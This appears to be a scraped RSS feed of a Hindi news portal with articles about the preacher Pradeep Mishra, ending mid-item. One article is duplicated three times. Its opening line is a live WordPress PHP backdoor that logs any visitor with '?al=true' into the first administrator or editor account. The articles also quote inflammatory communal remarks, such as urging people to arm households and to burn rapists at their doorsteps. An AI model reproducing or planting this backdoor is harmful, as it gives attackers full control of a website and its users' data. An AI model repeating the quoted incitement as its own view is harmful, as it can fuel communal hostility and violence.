// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Pandit Pradeep Mishra – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 25 Oct 2025 09:39:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 कुबेरेश्वर धाम में पंडित प्रदीप मिश्रा के साथ हरि-हर मिलन महोत्सव, हजारों भक्त होंगे शामिल https://pratyushaashakinayikiran.com/?p=187206 Sat, 25 Oct 2025 09:39:00 +0000 https://pratyushaashakinayikiran.com/?p=187206 सीहोर

सीहोर के निकट चितावलिया हेमा स्थित कुबेरेश्वर धाम परिसर में इस वर्ष 4 नवंबर को हरि-हर मिलन महोत्सव का आयोजन किया जा रहा है। हर वर्ष की तरह इस बार भी यह आयोजन अत्यंत भव्य रूप में संपन्न होगा। निर्माणाधीन मुरली मनोहर एवं कुबेरेश्वर महादेव मंदिर में इन दिनों तैयारियों का दौर तेजी पर है। मंच साज-सज्जा, प्रसादी व्यवस्था और भक्तों के ठहरने हेतु विशेष व्यवस्थाएं की जा रही हैं।

अंतर्राष्ट्रीय कथा वाचक पंडित प्रदीप मिश्रा के सान्निध्य में आयोजित होने वाले इस महोत्सव में हर वर्ग के श्रद्धालु भाग लेते हैं। सुबह से ही बाबा कुबेरेश्वर महादेव की आरती, अभिषेक और भोग लगाने के बाद नि:शुल्क भंडारा आरंभ हो जाता है। भक्तों की भीड़ में उमंग और भक्ति का अद्भुत संगम दिखाई देता है।

पंडित प्रदीप मिश्रा के आह्वान पर कार्तिक मास में प्रतिदिन हजारों श्रद्धालु दीपदान करने कुबेरेश्वरधाम पहुंच रहे हैं। दीप ज्वलन और दान को इस पवित्र महीने में अत्यंत पुण्यदायी माना गया है। इन दिनों चारों ओर जलते दीपक और हरि-हर के जयघोष से मंदिर परिसर अलौकिक आभा से भर उठता है।

इस वर्ष भी गुरुदेव के आदेश अनुसार 29 अक्टूबर को अन्नकूट महोत्सव मनाया जाएगा। यह आयोजन हर बार भक्तों के लिए सेवा और समर्पण की प्रेरणा लेकर आता है। भोग प्रसादी के रूप में हजारों श्रद्धालु खाद्यान्न वितरण में सहभागी बनते हैं। यह परंपरा गांव-गांव में संस्कारों का विस्तार करती है।

चार नवंबर को होने वाला हरि-हर मिलन उस क्षण का प्रतीक है, जब भगवान विष्णु और भगवान शंकर का आध्यात्मिक मिलन दर्शाया जाता है। यह दृश्य भक्तों को जीवन में एकता, प्रेम और सहअस्तित्व का संदेश देता है। मंदिर के प्रांगण में गूंजते शंखनाद और भजन इस मिलन को दिव्यता के चरम पर पहुंचाते हैं।

महोत्सव के दौरान देशभर से आने वाले श्रद्धालु यहां अपने परिवार सहित उपस्थित रहेंगे। निरंतर चलने वाले भंडारे, कथा वाचन, मंत्र उच्चारण और सांस्कृतिक कार्यक्रमों से पूरा क्षेत्र भक्तिमय वातावरण में डूब जाएगा। कुबेरेश्वर धाम एक बार फिर जीवंत साक्षी बनेगा उस दिव्य अनुभूति का, जो केवल आस्था से संभव है। 

]]>
पहलगाम हमले पर बोले मशहूर कथावाचक पंडित प्रदीप मिश्रा- अमित शाह कलयुग के शंकर, दिखाएंगे तांडव https://pratyushaashakinayikiran.com/?p=151490 Fri, 25 Apr 2025 09:37:00 +0000 https://pratyushaashakinayikiran.com/?p=151490 भोपाल

मशहूर कथावाचक पंडित प्रदीप मिश्रा ने पहलगाम हमले का जिक्र करते हुए गृहमंत्री अमित शाह को भगवान शंकर का अवतार बताया है। मिश्रा ने कहा कि शाह कलयुग में भगवान शिव का अवतार हैं। वह शांत रहते हैं, मौन रहते हैं और तांडव भी दिखाते हैं। उन्होंने भरोसा जताया कि वह आंतकवादियों का अंत करेंगे। मिश्रा ने यह भी कहा कि हिंदुओं को अब जागना चाहिए और घर में शास्त्र हो या ना हो लेकिन शस्त्र चालना आना चाहिए।

प्रदीप मिश्रा ने शिव महापुराण कथा के दौरान पहलगाम में हुए आतंकवादी हमले का जिक्र किया और वहां लोगों की मौत पर दुख जाहिर किया। इसके साथ ही उन्होंने भरोसा जताया कि अमित शाह आंतकवादियों का नाश करके बदला लेंगे। उन्होंने शाह को भगवान शंकर का अवतार तक बता डाला। मिश्रा ने कहा, 'हमारे भारत के गृहमंत्री अमित शाह जी कलयुग में शिव का अवतार हैं। शांत भी रहते हैं, मौन भी रहते हैं और तांडव भी दिखाते हैं। भारत की भूमि के गृहमंत्री शिव का एक रूप हैं, मुझे पूर्ण भरोसा है कि उनकी मौनता और बाद में उनका तांडव जरूर देखने को मिलता है। मुझे भरोसा है कि उन आतंकियों का अंत होगा।'

प्रदीप मिश्रा ने कहा कि वहां वर्ण पूछकर नहीं बल्कि, धर्म पूछकर गोली मारी गई। उन्होंने कहा, 'समझने वाला विषय है कि वह आतंकी हिंदू पूछकर, उन्होंने ब्राह्मण नहीं पूछा, क्षत्रिय नहीं पूछा, शूद्र नहीं पूछा, उन्होंने तो पूछा हिंदू है, और गोलियों से भून दिया। एक लड़के की शादी तो आठ दिन पहले हुई थी। कश्मीर घूमने गए थे। उसकी पत्नी रोती बिलखती रही।'

मिश्रा ने कथा में मौजूद महिलाओं से कहा कि घर में शस्त्र रखें और बच्चों को इसे चलाना सिखाएं। उन्होंने कहा,'मेरा निवेदन है तुम्हारे घर में शास्त्र है या नहीं हमें उससे मतलब नहीं है, लेकिन तुम्हारे बेटा-बेटी को शस्त्र चलाना आना चाहिए। बेटी को भी चलाना सिखाओ। हमारे सनातन धर्म का कोई देवता बिना शस्त्र के नहीं है। हमारा घर बिना शस्त्र के नहीं होना चाहिए। जब वक्त पड़े उन शस्त्र को निकालो और सामने खड़े हो जाओ।'
'उन सांसदों को कश्मीर घाटी में सौंप दो'

प्रदीप मिश्रा ने वक्फ संशोधन कानून का जिक्र करते हुए सांसदों पर विवादित टिप्पणी की। उन्होंने कहा कि वक्फ बोर्ड संशोधन कानून का विरोध करने वाले सांसदों को कश्मीर घाटी में सौंप देना चाहिए। उन्होंने कहा, 'कितनी दुखद घटना कि पूछा जा रहा है कि तू हिंदू है और गोली मारी जाती है। बंगाल में देखा जा रहा है कि हिंदू है और घर से बाहर निकालकर मारा जा रहा है। संसद में बैठे हुए वो 200 सांसद वक्फ बोर्ड पर रातभर बहस करते हैं, हिंदुओं के नाम पर कलंक बैठे हैं, ले जाकर कश्मीर की घाटी में उनको सौंप दो। जो सनातन धर्म को छोड़कर, हिंदू होकर हिंदू धर्म को अपशब्द करते हैं, क्या जरूरत है इसकी, क्या जरूरत है उसकी।'

]]>
ओवैसी के बयान पर पंडित मिश्रा का पलटवार, बोले- ‘ये पाकिस्तान नहीं जो सहन करेंगे.. https://pratyushaashakinayikiran.com/?p=140207 Sat, 15 Mar 2025 11:40:00 +0000 https://pratyushaashakinayikiran.com/?p=140207 सीहोर

 मध्य प्रदेश के सीहोर जिले में स्थित कुबेरेश्वर धाम के पीठाधीश्वर और कथावाचक पंडित प्रदीप मिश्रा ने असदुद्दीन ओवैसी के ‘मस्जिद ढकी’ वाले बयान पर पलटवार किया है। पंडित मिश्रा ने कहा कि ओवैसी शायद ये भूल रहे हैं कि, वो भारत में रह रहें हैं। उन्होंने कहा कि ये भारत है पाकिस्तान नहीं जो आपको सहन करेंगे। जहां तक रही बात संघर्ष की तो हम संघर्ष के लिए तैयार है। भारत में जन्मा हर सनातनी शेर का बच्चा है। इस भारत भूमि के लिए संघर्ष करता रहेगा।

 बता दें कि हैदराबाद में आयोजित एक जलसे के दौरान अपने संबोधन में असदुद्दीन ओवैसी ने कहा है कि, आखिर अपने ही देश में मुसलमानों के साथ दोयम दर्जे का व्यवहार क्यों किया जा रहा है? असदुद्दीन ओवैसी ने कहा कि, ‘कोई कहता है- अगर तुम्हें डर है तो तुम नमाज मत पढ़ो घर में बैठ जाओ। कोई कहता है कि जैस मस्जिदों को कवर कर दिया तुम अपने सिर को कवर कर लो। कोई कहता है- बंगाल में अगर हम हुकूमत में आ जाएंगे तो मुसलमानों को बंगाल से निकाल देंगे।’

पंडित मिश्रा का पलटवार

अरे भाई वे डरपोक थे जो पाकिस्तान चले गए। ये जियालों की औलाद हैं हम भागने वालों में से नहीं हैं। हमारे लोग ईमान की दौलत से मालामाल थे। उन्होंने भारत को अपना वतन माना और मानते रहेंगे। ओवैसी ने होली के दौरान मस्जिदों को तिरपाल से ढकने के मुद्दे पर कहा था कि, ‘जो मुसलमान बुजदिल थे, वे पाकिस्तान चले गए, और हम भारत में रहकर संघर्ष करेंगे।’

]]>
ओवैसी के बयान पर पंडित मिश्रा का पलटवार, बोले- ‘ये पाकिस्तान नहीं जो सहन करेंगे.. https://pratyushaashakinayikiran.com/?p=140209 Sat, 15 Mar 2025 11:40:00 +0000 https://pratyushaashakinayikiran.com/?p=140209 सीहोर

 मध्य प्रदेश के सीहोर जिले में स्थित कुबेरेश्वर धाम के पीठाधीश्वर और कथावाचक पंडित प्रदीप मिश्रा ने असदुद्दीन ओवैसी के ‘मस्जिद ढकी’ वाले बयान पर पलटवार किया है। पंडित मिश्रा ने कहा कि ओवैसी शायद ये भूल रहे हैं कि, वो भारत में रह रहें हैं। उन्होंने कहा कि ये भारत है पाकिस्तान नहीं जो आपको सहन करेंगे। जहां तक रही बात संघर्ष की तो हम संघर्ष के लिए तैयार है। भारत में जन्मा हर सनातनी शेर का बच्चा है। इस भारत भूमि के लिए संघर्ष करता रहेगा।

 बता दें कि हैदराबाद में आयोजित एक जलसे के दौरान अपने संबोधन में असदुद्दीन ओवैसी ने कहा है कि, आखिर अपने ही देश में मुसलमानों के साथ दोयम दर्जे का व्यवहार क्यों किया जा रहा है? असदुद्दीन ओवैसी ने कहा कि, ‘कोई कहता है- अगर तुम्हें डर है तो तुम नमाज मत पढ़ो घर में बैठ जाओ। कोई कहता है कि जैस मस्जिदों को कवर कर दिया तुम अपने सिर को कवर कर लो। कोई कहता है- बंगाल में अगर हम हुकूमत में आ जाएंगे तो मुसलमानों को बंगाल से निकाल देंगे।’

पंडित मिश्रा का पलटवार

अरे भाई वे डरपोक थे जो पाकिस्तान चले गए। ये जियालों की औलाद हैं हम भागने वालों में से नहीं हैं। हमारे लोग ईमान की दौलत से मालामाल थे। उन्होंने भारत को अपना वतन माना और मानते रहेंगे। ओवैसी ने होली के दौरान मस्जिदों को तिरपाल से ढकने के मुद्दे पर कहा था कि, ‘जो मुसलमान बुजदिल थे, वे पाकिस्तान चले गए, और हम भारत में रहकर संघर्ष करेंगे।’

]]>
ओवैसी के बयान पर पंडित मिश्रा का पलटवार, बोले- ‘ये पाकिस्तान नहीं जो सहन करेंगे.. https://pratyushaashakinayikiran.com/?p=140211 Sat, 15 Mar 2025 11:40:00 +0000 https://pratyushaashakinayikiran.com/?p=140211 सीहोर

 मध्य प्रदेश के सीहोर जिले में स्थित कुबेरेश्वर धाम के पीठाधीश्वर और कथावाचक पंडित प्रदीप मिश्रा ने असदुद्दीन ओवैसी के ‘मस्जिद ढकी’ वाले बयान पर पलटवार किया है। पंडित मिश्रा ने कहा कि ओवैसी शायद ये भूल रहे हैं कि, वो भारत में रह रहें हैं। उन्होंने कहा कि ये भारत है पाकिस्तान नहीं जो आपको सहन करेंगे। जहां तक रही बात संघर्ष की तो हम संघर्ष के लिए तैयार है। भारत में जन्मा हर सनातनी शेर का बच्चा है। इस भारत भूमि के लिए संघर्ष करता रहेगा।

 बता दें कि हैदराबाद में आयोजित एक जलसे के दौरान अपने संबोधन में असदुद्दीन ओवैसी ने कहा है कि, आखिर अपने ही देश में मुसलमानों के साथ दोयम दर्जे का व्यवहार क्यों किया जा रहा है? असदुद्दीन ओवैसी ने कहा कि, ‘कोई कहता है- अगर तुम्हें डर है तो तुम नमाज मत पढ़ो घर में बैठ जाओ। कोई कहता है कि जैस मस्जिदों को कवर कर दिया तुम अपने सिर को कवर कर लो। कोई कहता है- बंगाल में अगर हम हुकूमत में आ जाएंगे तो मुसलमानों को बंगाल से निकाल देंगे।’

पंडित मिश्रा का पलटवार

अरे भाई वे डरपोक थे जो पाकिस्तान चले गए। ये जियालों की औलाद हैं हम भागने वालों में से नहीं हैं। हमारे लोग ईमान की दौलत से मालामाल थे। उन्होंने भारत को अपना वतन माना और मानते रहेंगे। ओवैसी ने होली के दौरान मस्जिदों को तिरपाल से ढकने के मुद्दे पर कहा था कि, ‘जो मुसलमान बुजदिल थे, वे पाकिस्तान चले गए, और हम भारत में रहकर संघर्ष करेंगे।’

]]>
पंडित प्रदीप मिश्रा बोले वर्तमान समय में एकता बेहद जरूरी https://pratyushaashakinayikiran.com/?p=120999 Mon, 13 Jan 2025 22:08:00 +0000 https://pratyushaashakinayikiran.com/?p=120999 सीहोर
आज के समय में संगठित रहना समय की जरूरत है। इसके लिए पहल होना आवश्यक है। सीहोर में सर्व ब्राह्मण समाज द्वारा परिचय सम्मेलन के आयोजन की पहल की गई, ये गौरवान्वित करने वाला आयोजन है। यहां पर सर्व ब्राह्मण समाज के लोगों ने एक मंच पर एकत्रित होकर जहां एकता का परिचय दिया गया है, वहीं संगठित समाज की परिभाषा को और ज्यादा मजबूत किया है। ऐसे आयोजन समाज को संगठित करने के लिए बेहद जरूरी है। ये बातें प्रसिद्ध कथावाचक पंडित प्रदीप मिश्रा ने कही।

वे सीहोर के यशराज गार्डन में सर्व ब्राह्मण एकता मंच सीहोर द्वारा आयोजित सर्व ब्राह्मण युवक-युवती परिचय सम्मेलन में मुख्य अतिथि के रूप में शामिल हुए थे। इस दौरान यहां उपस्थित लोगों ने भी उनसे आशीर्वाद प्राप्त किया। परिचय सम्मेलन में 450 से अधिक युवक-युवतियों की प्रविष्ठियां प्राप्त हुईं थीं। इस दौरान सभी ने मंच पर उपस्थित होकर बेझिझक अपना परिचय दिया। परिचय सम्मेलन में मध्यप्रदेश के भोपाल, इंदौर, जबलपुर, ग्वालियर, शाजापुर और विदिशा सहित अन्य शहरों एवं हरियाणा से भी ब्राह्मण समाज के लोग पहुंचे थे। इससे पहले कार्यक्रम की विधिवत शुरूआत भगवान श्रीपरशुराम, मां सरस्वती के चित्र पर माल्यार्पण एवं दीप प्रज्जवलन के साथ हुई। इस दौरान श्रीगणेश वंदना भी हुई।

मंच पर पहुंचकर दिया परिचय
सर्व ब्राह्मण एकता मंच द्वारा आयोजित परिचय सम्मेलन के लिए करीब 450 युवक-युवतियों की प्रविष्ठियां प्राप्त हुईं थी। इस दौरान करीब 150 युवतियां एवं 300 युवकों की प्रविष्ठियां आईं थीं। सभी ने एक-एक करके मंच पर पहुंचकर अपना परिचय दिया। परिचय के दौरान युवक-युवतियों ने अपना नाम, शिक्षा के साथ-साथ अपने दिल की इच्छाएं भी जाहिर की, ताकि उन्हें उनका भावी जीवनसाथ वैसा मिल सके। एक युवक ने शादी के बाद संयुक्त परिवार के साथ रहने की अपनी इच्छा बताई, तो वहीं कई युवकों ने खुद का स्वरोजगार होना बताया। कई युवक ऐसे भी थे, जो शासकीय सेवा, आईटी कंपनी सहित अन्य जगह नौकरियां कर रहे हैं। इसी तरह युवतियों ने भी अपना परिचय बेझिझक होकर दिया।

सम्मेलन में वितरित की गईं बुकलेट
सर्व ब्राह्मण एकता मंच द्वारा सम्मेलन के लिए आई प्रविष्ठियों की एक बुकलेट भी छपवाई गई, जो सम्मेलन में वितरित की गई। इसमें युवक-युवतियों के परिचय, पारिवारिक पृष्ठभूमि, गौत्र सहित अन्य जानकारियां हैं। इसके अलावा बुकलेट में सीहोर के प्रसिद्ध कथावाचक, महिला शक्ति, युवा शक्ति सहित अन्य जानकारियां भी हैं।

तिलक लगाकर किया आंगतुकों का स्वागत
परिचय सम्मेलन में शामिल होने के लिए आए अतिथियों सहित समाजजनों का गेट पर महिला शक्ति द्वारा तिलक लगाकार स्वागत, सत्कार किया गया। इस दौरान उन्हें अंगवस्त्र भी पहनाया गया।

ये भी हुए शामिल
सर्व ब्राह्मण समाज सीहोर द्वारा आयोजित युवक-युवती परिचय सम्मेलन में मुख्य अतिथि के रूप में प्रसिद्ध कथावाचक पंडित प्रदीप मिश्रा शामिल हुए। मुख्य अतिथि पूर्व मंत्री दीपक जोशी रहे। विशिष्ठ अतिथि समाजसेवी अखिलेश राय रहे। विशेष अतिथि सीहोर विधायक सुदेश राय, पूर्व विधायक रमेश सक्सेना, नगर पालिका अध्यक्ष प्रिंस राठौर, वरिष्ठ भाजपा नेता सन्नी महाजन, सीहोर जिला कांग्रेस अध्यक्ष राजीव गुजराती भी शामिल हुए।

कार्यक्रम के संयोजक पंडित अखिल शर्मा थे। परिचय सम्मेलन में सम्मेलन के अध्यक्ष राजेश मोहन शर्मा, सर्व ब्राह्मण समाज अध्यक्ष दीपक शर्मा, सर्व ब्राह्मण समाज के कार्यकारी अध्यक्ष सुदीप व्यास, ब्राह्मण महिला मंडल जिलाध्यक्ष नीलम शर्मा, उपाध्यक्ष मिथलेश शर्मा, ललित शर्मा, कोषाध्यक्ष राजेश तिवारी, सचिव नवनीत उपाध्याय सहित संरक्षक मंडल के मनोहर शर्मा, हरिओम दाउ, रमाकांत समाधिया, प्रवीण तिवारी, महेश दुबे, प्रदीप त्यागी, अमन दुबे, आशुतोष मोनी शर्मा, योगेश श्रोत्रिय सहित बड़ी संख्या में अन्य शाखाओं के पदाधिकारी सहित प्रदेशभर से समाजजन भी उपस्थित रहे। अंत में सर्व ब्राह्मण समाज अध्यक्ष दीपक शर्मा सहित समस्त कार्यकारिणी ने परिचय सम्मेलन में पधारे सभी अतिथियों एवं समाजजनों का आभार भी प्रकट किया।

]]>
पं. प्रदीप मिश्रा की कथा पंडाल में दो दिन में 200 चोरी से पुलिस भी सकते में, 15 महिलाएं गिरफ्तार https://pratyushaashakinayikiran.com/?p=101573 Fri, 22 Nov 2024 14:36:00 +0000 https://pratyushaashakinayikiran.com/?p=101573 वाराणसी.
 मध्य प्रदेश के प्रसिद्ध कथावाचक पंडित प्रदीप मिश्रा इन दिनों वाराणसी के डोमरी में कथा कर रहे हैं. चौंकाने वाली बात यह है कि उनकी कथा में जुट रही भीड़ का चोरों ने जमकर फायदा उठाया है. यहां चोरों ने दो दिनों के अंदर 200 घटनाओं को अंजाम दिया है. इन चोरों ने खासकर महिलाओं के गहनों और मंगलसूत्र को निशाना बनाया है. चोरियों के मामले में पुलिस ने 15 शातिर महिलाओं को भी गिरफ्तार किया है. दूसरी ओर, इन चोरियों ने कथा के आयोजकों की नींद उड़ा दी. आयोजकों ने इन चोरियों को लेकर पुलिस कमिश्नर से शिकायत की है.

गौरतलब है कि, आयोजकों की शिकायत मिलने के बाद पुलिस कमिश्नर खुद भी मौके पर पहुंचे. इसके बाद पुलिस की टीम ने पूरे पंडाल में लगे सीसीटीवी कैमरों को खंगाला. इनमें कुछ महिलाएं कथा के बीच में बार-बार जगह बदलती दिखाई दीं. पुलिस ने जब उनकी तहकीकात की तो पता चला कि ये महिलाएं चोरी की घटना को अंजाम दे रही हैं. इस दौरान पुलिस उस वक्त चौंक गई जब पूरी की पूरी महिला चोर गैंग पंडाल में वारदात करती मिली. ये महिला चोर इतनी शातिर हैं कि इन पर शक करना मुश्किल है. ये महिलाएं पलक झपकते ही गहने और रुपये गायब कर देती हैं.

बेहद शातिर हैं महिलाएं
बताया जाता है कि, पकड़ी गई महिलाओं को पुलिस का जरा भी खौफ नहीं है. भास्कर डॉट कॉम के मुताबिक, पुलिस ने जब महिलाओं से पूछताछ करनी शुरू की तो महिलाओं ने जांच टीम को गुमराह किया. इन महिलाओं ने नाम से लेकर मोबाइल नंबर तक गलत बताया. जब पुलिस ने इनकी जानकारी को प्रमाणित करने की कोशिश की तो सब कुछ गलत निकला. पुलिस अब और गहराई से इन महिलाओं की पड़ताल कर रही है. पुलिस का कहना है कि ये महिलाओं दूसरे जिले की हैं. उनके आपराधिक रिकॉर्ड को भी खंगाला जा रहा है.

]]>
धमतरी जिले में शिव महापुराण कथा के दौरान पंडित प्रदीप मिश्रा ने कन्याओं के प्रति बढ़ते अपराधों पर गहरी चिंता व्यक्त की https://pratyushaashakinayikiran.com/?p=73744 Sun, 22 Sep 2024 21:45:00 +0000 https://pratyushaashakinayikiran.com/?p=73744 धमतरी
धमतरी जिले में शिव महापुराण कथा के दौरान सीहोर के पंडित प्रदीप मिश्रा ने कन्याओं के प्रति बढ़ते अपराधों पर गहरी चिंता व्यक्त की। उन्होंने समाज में गलत कृत्यों के खिलाफ कड़े कदम उठाने की अपील की। उन्होंने बेटियों की सुरक्षा के लिए आत्मरक्षा सिखाने की आवश्यकता पर जोर दिया। मिश्रा ने कहा कि जहां बेटियों का सम्मान नहीं होता, वहां भविष्य में महाभारत और रामायण जैसी स्थितियां उत्पन्न हो सकती हैं। उन्होंने कहा कि आज छोटी-छोटी बच्चियों, कन्याओं और लड़कियों के साथ गलत कृत्य हो रहा है। इसका कारण है कि गलत चीजें मोबाइल पर देखी जा रही है। गलत नीति रखी जा रही है, गलत नीयत रखी जा रही है, गलत नजर रखी जा रही है, जो बेटियां कंधे पर ठीक से स्कूल का बैग धारण नहीं कर पा रही है, उनके साथ भी गलत कृत्य हो रहा है।

दुष्कर्मियों को चौखत पर जला दो
लंका का राजा रावण ने सीता को छुआ था और मां जानकी को लंका लेकर गया, तो आज तक दशहरे व विजयादशमी पर रावण का पुतला जलाया जाता है। इस व्यास पीठ के माध्यम से मेरा इतना सा निवेदन है कि जिस नगर में, जिस मोहल्ले में और जिस गांव और क्षेत्र में छोटी बच्चियों, कन्याओं और लड़कियों के साथ गलत कृत्य हो रहा है, उसे लाकर उनके चौखट पर जला दो, उसके पुतले को नहीं।

बेटियों व स्त्रियों की रक्षा खुद करें
रूद्रेश्वर महादेव संघ समिति बांसपारा कुकरेल के तत्वावधान में ग्राम पंचायत कांटाकुर्रीडीह में कथा का आयोजन किया है। पंडित मिश्रा ने आगे कहा कि आज अपनी बेटियों व घरों की स्त्रियों की रक्षा स्वयं को करनी होगी, कोई दूसरा नहीं करता। कॉलेज, स्कूल भेज रहे हो, तो बच्चियों व युवतियों को तलवार, भाला, डंडा चलाने और कराटे सिखाकर बेटियों को आत्मबल दीजिए।

बेटियां किसी भी धर्म के दिखावे में न आएं
उन्होंने कहा कि भारत की बेटियां नौकरी करेंगी। खूब पढ़ेंगी और शादियां मां-बाप की इच्छा से करें। किसी भी धर्म के दिखावे पर न जाएं। लोभ में न जाएं। दूसरों के चक्कर में न पड़ो और दूसरे धर्मों को न अपनाएं, इसलिए नीति, नीयत और नजर हमेशा ठीक रखें। नीति, नीयत और नजर बिगड़ जाए तो हर कार्य बिगड़ जाएगा। जहां स्त्री का सम्मान, आदर और इज्जत नहीं हुआ, तो भविष्य में रामायण और महाभारत का होना तय है। रावण की नीयत बिगड़ी तो रामायण हुआ और कौरवों की नीयत बिगड़ी तो महाभारत हुआ।

जीवन के लिए ये तीन चीजें खतरनाक
मिश्रा ने कहा कि तीन चीजें शनि, मनी और दुश्मनी जीवन के लिए बहुत ही खतरनाक होती है। कुंडली में यदि शनि आ जाए, तो गड़बड़ हो जाता है। जीवन में मनी और दुश्मनी आ जाए तो भी गडबड़ हो जाता है। मन में यदि मनी आए तो जीवन को बर्बाद कर देगा, इसलिए लक्ष्मी को हमेशा तिजौरी, आलमारी और लाकर में रखें। दिल में आने न दें। पैसा जिस दिन मन में आकर बैठ जाता है, उस दिन से नींद आना बंद हो जाती है। जिंदगी नर्क हो जाती है। केवल धन ही धन सोचते हैं।

]]>
पंडित प्रदीप मिश्रा को ब्रज के संत-सेवायतों का अल्टीमेटम, बोले- 3 दिन में क्षमा मांगो, वरना 84 कोस में घुसने नहीं देंगे https://pratyushaashakinayikiran.com/?p=45161 Tue, 25 Jun 2024 15:06:00 +0000 https://pratyushaashakinayikiran.com/?p=45161 मथुरा

कथावाचक प्रदीप मिश्रा की ओर से राधारानी के बारे में टिप्पणी किए जाने का मामला तूल पकड़ गया है. बरसाना में ब्रज के मंदिरों के सेवायतों और साधु-संतों की एक महापंचायत का आयोजन किया गया. श्री धाम बरसाना के रसमंडप में हुई इस महापंचायत में बड़ी संख्या में लोगों ने भाग लिया. इसमें साधु संत, गोस्वामियों और धार्मिक संगठनों ने एक सुर में कहा कि अगर प्रदीप मिश्रा 3 दिन के भीतर क्षमा नहीं मांगेंगे तो उन्हें ब्रज क्षेत्र में घुसने नहीं दिया जाएगा. उधर, उज्जैन के महर्षि सांदीपनि के वंशज पंडित रूपम व्यास ने प्रदीप मिश्रा से नाक रगड़कर माफी मांगने का अल्टीमेटम दिया है. ऐसा न करने पर मिश्रा के उज्जैन में घुसने पर प्रतिबंध लगाने की चेतावनी दी है.

महापंचायत की अध्यक्षता करने वाले संत रमेश बाबा बोले, ''प्रदीप मिश्रा ने कहा है कि राधानी भगवान श्रीकृष्ण की धर्मपत्नी नहीं थीं. उनका विवाह छाता निवासी अनय घोष संग  हुआ था. बरसाना राधारानी का गांव नहीं है. दरअसल, उनके पिता बृषभानु वर्ष में एक बार बरसाना में कचहरी लगाने आते थे, इसलिए बरसाना नाम पड़ा.''  इस टिप्पणी को लेकर ही प्रदीप मिश्रा के खिलाफ ब्रज में उबाल है. इससे पहले प्रेमानंद महाराज ने भी प्रदीप मिश्रा का विरोध किया था.

बरसाना में हुई महापंचायत में निर्णय किया है कि अगर कथावाचक प्रदीप मिश्रा अपनी टिप्पणी को लेकर माफी नहीं मांगते हैं तो उनका हर स्तर पर विरोध किया जाए. उनके कथा के कार्यक्रमों हों, वहां उनके विरोध के साथ-साथ इलेक्ट्रॉनिक मीडिया और सोशल मीडिया पर भी उनका विरोध किया जाए.

कई घंटे तक चली इस महापंचायत में कहा गया कि 7 दिन के अंदर अगर प्रदीप मिश्रा के खिलाफ पुलिस एफआईआर दर्ज नहीं करती तो एक बड़ा आंदोलन करके जिला प्रशासन का घेराव किया जाएगा. प्रदीप मिश्रा से अभिलंब 3 दिन के अंदर क्षमा मांगने की बात कही गई है. यह 7 दिन के अंदर में बरसाना आकर क्षमा नहीं मांगते हैं तो एक बड़ा आंदोलन किया जाएगा.

प्रदीप मिश्रा को चेतावनी

महापंचायत में शामिल रमेश बाबा महाराज,  मृदुल कृष्ण शास्त्री और राम कठोर पांडे ने कहा, प्रदीप मिश्रा अविलंब 3 दिन में राधारानी से क्षमा मांगें और समस्त राष्ट्रीय न्यूज चैनल, सोशल मीडिया और प्रिंट मीडिया के जरिए मांफीनामा सार्वजनिक रूप से दें और कहें कि मेरे अल्प ज्ञान व मूढ़ता के कारण मुझसे यह बहुत बड़ा भगवद अपराध हुआ है. इस विषय में मेरे द्वारा कहा गया हर शब्द पूर्णतः असत्य व आधारहीन है. मैं समस्त ब्रजवासियों, देशभर के साधु संतों और विश्व भर के राधाकृष्ण भक्तों से ह्रदय से क्षमायाचना करता हूं. साथ ही मिश्रा इसके पश्चात 7 दिवस के भीतर बरसाना धाम में आकर राधारानी से आकर क्षमा मांगनी होगी. अगर वह ऐसा नहीं करते हैं तो यह क्षमा भी स्वीकार्य नहीं होगी.

महापंचायत में पारित प्रस्ताव

1. समस्त वैष्णवाचार्यों, संतों, समस्त शंकराचार्यों, श्री निम्बाकाचार्य, श्री रामानुजाचार्य, श्री वल्लभाचार्य, श्री रामानन्दाचार्य, श्री गौड़ीय सम्प्रदाय के शीर्षस्थ संतों से निवेदन करके व्यासपीठ से प्रदीप मिश्रा को सर्वदा के लिए बहिस्कृत किया जाए. साथ ही व्यासपीठ के लिए नियामक कमेटी बनाकर व्यासपीठ की पवित्रता सुनिश्चित की जाए.
2. प्रदीप मिश्रा द्वारा क्षमा न मांगने पर सम्पूर्ण ब्रज मण्डल में उनका प्रवेश निषेध रहेगा.
3. जहां-जहां कथा हो वहां-वहां सोशल मीडिया, इलेक्ट्रॉनिक मीडिया, जन प्रदर्शन आदि के माध्यम से अभियान चलाकर कथा का विरोध व प्रदीप मिश्रा का विरोध किया जाएगा.
4. मिश्रा का समर्थन करने वाले सभी जयचन्दों का भी विरोध व उनके खिलाफ एफआईआर दर्ज की जाएगी.
5. पूरे भारतवर्ष में अल्प ज्ञान के कारण अनाधिकारी चेष्ठा कर धार्मिक पहचान पर कुठाराघात करने का प्रयास करने वाले धर्म के ठेकेदारों के विरुद्ध सशक्त आन्दोलन व प्रदर्शन किया जाएगा.
6. जिला प्रशासन ने अगर समस्त साक्ष्य देने के बाद भी प्रदीप मिश्रा के खिलाफ 7 दिन में FIR दर्ज कर सख्त कार्यवाही नहीं की तो अविलम्ब जिला कार्यालय का घेराव किया जाएगा.
7. हमारी भारतीय संस्कृति, आध्यात्मिक पहचान व सनातनी धार्मिक अस्तित्व पर अब किसी भी प्रकार का कोई भी प्रश्नचिन्ह, कुठाराघात या अनर्गल वक्तृत्व बर्दाश्त नहीं किया जाएगा . इस प्रकार के किसी भी कृत के लिये पूरा संत समाज, समस्त वैष्णववृन्द, भक्तगण पुरजोर विरोध करेंगे आवश्यकता पड़ने पर देशव्यापी आंदोलन भी करेंगे.
8. 'महाराज' फिल्म पर तुरंत रोक लगाई जाए. यह महापंचायत नेटफ्लिक्स पर प्रसारित होने वाली फिल्म का पूर्ण बहिष्कार करती है.

 

]]>
हम तो तुलसीदास जैसे गंवार… राधारानी के बाद पंडित प्रदीप मिश्रा का नया विवाद https://pratyushaashakinayikiran.com/?p=43526 Thu, 20 Jun 2024 18:06:00 +0000 https://pratyushaashakinayikiran.com/?p=43526 भोपाल
